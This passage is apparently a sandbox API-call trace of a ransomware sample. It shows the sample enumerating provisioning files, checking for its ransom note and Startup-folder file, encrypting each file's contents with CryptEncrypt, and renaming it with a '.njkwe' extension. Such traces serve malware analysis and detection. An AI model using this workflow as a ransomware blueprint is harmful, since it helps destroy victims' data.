Size=0x400) returned 0xc472e0 [0077.028] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\162__Connections_Cellular_Vodafone Greece (Greece)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 188 [0077.028] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\162__Connections_Cellular_Vodafone Greece (Greece)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\162__connections_cellular_vodafone greece (greece)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\162__Connections_Cellular_Vodafone Greece (Greece)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\162__connections_cellular_vodafone greece (greece)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.029] GetProcessHeap () returned 0xbe0000 [0077.029] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.029] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9064e061, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9064e061, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9064e061, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1e0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="163__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="163__C~1.PRO")) returned 1 [0077.029] lstrcmpiW (lpString1="163__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0077.029] lstrcmpiW (lpString1="163__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0077.029] lstrcmpiW (lpString1="163__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0077.029] lstrcmpiW (lpString1="163__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0077.029] lstrcmpiW (lpString1="163__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0077.029] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\163__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0077.029] StrStrIW (lpFirst="163__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0077.029] lstrcmpW (lpString1="163__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.029] lstrcmpW (lpString1="163__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0077.029] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\163__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.029] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\163__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\163__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.030] GetTickCount () returned 0x115398b [0077.030] GetTickCount () returned 0x115398b [0077.030] GetTickCount () returned 0x115398b [0077.030] GetTickCount () returned 0x115398b [0077.030] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.030] GetProcessHeap () returned 0xbe0000 [0077.030] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.030] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0077.031] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.031] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0077.032] GetProcessHeap () returned 0xbe0000 [0077.032] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.032] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.032] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.032] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.032] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.032] CloseHandle (hObject=0x43c) returned 1 [0077.033] GetProcessHeap () returned 0xbe0000 [0077.033] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.033] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\163__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0077.033] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\163__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\163__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\163__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\163__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.033] GetProcessHeap () returned 0xbe0000 [0077.033] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.033] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9064e061, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9064e061, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9064e061, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x353, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="164__Connections_Cellular_Orange Caraïbe (France)_i0$(__MVID)@WAP.provxml", cAlternateFileName="164__C~1.PRO")) returned 1 [0077.033] lstrcmpiW (lpString1="164__Connections_Cellular_Orange Caraïbe (France)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.033] lstrcmpiW (lpString1="164__Connections_Cellular_Orange Caraïbe (France)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.033] lstrcmpiW (lpString1="164__Connections_Cellular_Orange Caraïbe (France)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.033] lstrcmpiW (lpString1="164__Connections_Cellular_Orange Caraïbe (France)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.033] lstrcmpiW (lpString1="164__Connections_Cellular_Orange Caraïbe (France)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.034] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\164__Connections_Cellular_Orange Caraïbe (France)_i0$(__MVID)@WAP.provxml") returned 167 [0077.034] StrStrIW (lpFirst="164__Connections_Cellular_Orange Caraïbe (France)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.034] lstrcmpW (lpString1="164__Connections_Cellular_Orange Caraïbe (France)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.034] lstrcmpW (lpString1="164__Connections_Cellular_Orange Caraïbe (France)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.034] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\164__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.034] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\164__Connections_Cellular_Orange Caraïbe (France)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\164__connections_cellular_orange caraïbe (france)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.034] GetTickCount () returned 0x115398b [0077.034] GetTickCount () returned 0x115398b [0077.034] GetTickCount () returned 0x115398b [0077.034] GetTickCount () returned 0x115398b [0077.034] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.034] GetProcessHeap () returned 0xbe0000 [0077.034] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.034] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x353, lpOverlapped=0x0) returned 1 [0077.036] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcad, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.036] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x353, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x353, lpOverlapped=0x0) returned 1 [0077.036] GetProcessHeap () returned 0xbe0000 [0077.036] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.036] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.036] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.036] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.036] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.036] CloseHandle (hObject=0x43c) returned 1 [0077.036] GetProcessHeap () returned 0xbe0000 [0077.036] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.036] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\164__Connections_Cellular_Orange Caraïbe (France)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 187 [0077.036] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\164__Connections_Cellular_Orange Caraïbe (France)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\164__connections_cellular_orange caraïbe (france)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\164__Connections_Cellular_Orange Caraïbe (France)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\164__connections_cellular_orange caraïbe (france)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.037] GetProcessHeap () returned 0xbe0000 [0077.037] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.037] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9064e061, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9064e061, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9064e061, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2bf, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="165__Connections_Cellular_Claro (Guatemala)_i0$(__MVID)@WAP.provxml", cAlternateFileName="165__C~1.PRO")) returned 1 [0077.037] lstrcmpiW (lpString1="165__Connections_Cellular_Claro (Guatemala)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.037] lstrcmpiW (lpString1="165__Connections_Cellular_Claro (Guatemala)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.037] lstrcmpiW (lpString1="165__Connections_Cellular_Claro (Guatemala)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.037] lstrcmpiW (lpString1="165__Connections_Cellular_Claro (Guatemala)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.037] lstrcmpiW (lpString1="165__Connections_Cellular_Claro (Guatemala)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.037] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\165__Connections_Cellular_Claro (Guatemala)_i0$(__MVID)@WAP.provxml") returned 161 [0077.037] StrStrIW (lpFirst="165__Connections_Cellular_Claro (Guatemala)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.037] lstrcmpW (lpString1="165__Connections_Cellular_Claro (Guatemala)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.037] lstrcmpW (lpString1="165__Connections_Cellular_Claro (Guatemala)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.037] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\165__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.038] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\165__Connections_Cellular_Claro (Guatemala)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\165__connections_cellular_claro (guatemala)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.038] GetTickCount () returned 0x115398b [0077.038] GetTickCount () returned 0x115398b [0077.038] GetTickCount () returned 0x115398b [0077.038] GetTickCount () returned 0x115398b [0077.038] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.038] GetProcessHeap () returned 0xbe0000 [0077.038] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.038] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2bf, lpOverlapped=0x0) returned 1 [0077.040] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd41, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.040] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2bf, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2bf, lpOverlapped=0x0) returned 1 [0077.040] GetProcessHeap () returned 0xbe0000 [0077.040] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.040] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.040] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.040] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.040] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.040] CloseHandle (hObject=0x43c) returned 1 [0077.040] GetProcessHeap () returned 0xbe0000 [0077.040] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.040] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\165__Connections_Cellular_Claro (Guatemala)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 181 [0077.040] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\165__Connections_Cellular_Claro (Guatemala)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\165__connections_cellular_claro (guatemala)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\165__Connections_Cellular_Claro (Guatemala)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\165__connections_cellular_claro (guatemala)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.041] GetProcessHeap () returned 0xbe0000 [0077.041] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.041] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9064e061, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9064e061, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9064e061, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x28e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="166__Connections_Cellular_Claro (Guatemala)_i1$(__MVID)@WAP.provxml", cAlternateFileName="166__C~1.PRO")) returned 1 [0077.041] lstrcmpiW (lpString1="166__Connections_Cellular_Claro (Guatemala)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.041] lstrcmpiW (lpString1="166__Connections_Cellular_Claro (Guatemala)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.041] lstrcmpiW (lpString1="166__Connections_Cellular_Claro (Guatemala)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.041] lstrcmpiW (lpString1="166__Connections_Cellular_Claro (Guatemala)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.041] lstrcmpiW (lpString1="166__Connections_Cellular_Claro (Guatemala)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.041] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\166__Connections_Cellular_Claro (Guatemala)_i1$(__MVID)@WAP.provxml") returned 161 [0077.041] StrStrIW (lpFirst="166__Connections_Cellular_Claro (Guatemala)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.041] lstrcmpW (lpString1="166__Connections_Cellular_Claro (Guatemala)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.041] lstrcmpW (lpString1="166__Connections_Cellular_Claro (Guatemala)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.041] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\166__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.041] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\166__Connections_Cellular_Claro (Guatemala)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\166__connections_cellular_claro (guatemala)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.041] GetTickCount () returned 0x115398b [0077.042] GetTickCount () returned 0x115398b [0077.042] GetTickCount () returned 0x115398b [0077.042] GetTickCount () returned 0x115398b [0077.042] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.042] GetProcessHeap () returned 0xbe0000 [0077.042] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.042] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x28e, lpOverlapped=0x0) returned 1 [0077.043] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd72, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.043] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x28e, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x28e, lpOverlapped=0x0) returned 1 [0077.043] GetProcessHeap () returned 0xbe0000 [0077.043] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.043] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.044] WriteFile 